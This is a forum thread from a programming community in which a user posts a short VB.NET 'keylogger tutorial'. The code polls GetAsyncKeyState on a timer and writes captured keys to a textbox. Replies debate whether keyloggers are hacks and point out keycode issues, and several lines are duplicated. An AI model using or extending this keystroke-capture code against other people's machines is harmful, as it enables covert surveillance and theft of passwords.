Keylogger (Tutorial)
Heres your chance to share your own tutorials with the community. Just post them on here. If your lucky they may even be posted on the main site.
9 posts
Page 1 of 1
Requirements: 1 Form, 1 TextBox & 1 Timer.
1: Set Timer Enabled Property to True and change it's interval to 1
2: Add the following Code
1: Set Timer Enabled Property to True and change it's interval to 1
2: Add the following Code
Code: Select all
-Thanks-Public Class Form1
Dim key As Integer
Private Declare Function GetAsyncKeyState Lib "user32" (ByVal vKey As Long) As Integer
Timer_Tick event:
Private Sub Timer1_Tick(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Timer1.Tick
For i = 1 To 255
key = 0
key = GetAsyncKeyState(i)
If key = -32767 Then
TextBox1.Text = TextBox1.Text + Chr(i)
End If
Next i
End Sub
Last edited by MANSQN on Tue Feb 14, 2012 10:16 pm, edited 2 times in total.
Welcome to CnS
)
And, btw, keyloggers are considered as hacks, and this forum doesn't allow hacks/cracks...etc
Have fun here
Nice other tuts cooll;

And, btw, keyloggers are considered as hacks, and this forum doesn't allow hacks/cracks...etc

Have fun here

Nice other tuts cooll;
Nice tutorial, and welcome to the site!
Keyloggers are not always hacks. They could be used in programs to detect special short key stroaks (like Windows Key and a letter).
Keyloggers are not always hacks. They could be used in programs to detect special short key stroaks (like Windows Key and a letter).
Last edited by Cheatmasterbw on Sun Sep 18, 2011 3:53 am, edited 1 time in total.
agreed but you dont have to use a keylogger and yea welcome to the forums
and for future references use
and for future references use
Code: Select all
Thansk everyone just found the site last night n its a great lil site.
In many cases a keycode is not the same as a character, also if your keyboard has less than 255 keys then the code should be changed.
Last edited by mandai on Sun Sep 18, 2011 6:27 pm, edited 1 time in total.
Dont bump please... the last post was 18 september 2011 and you post it at 24 oct 2011 which is 35 days -.-"
Practice makes perfect!
VIP since: 6-10-2011
VIP since: 6-10-2011
9 posts
Page 1 of 1
Copyright Information
Copyright © Codenstuff.com 2020 - 2023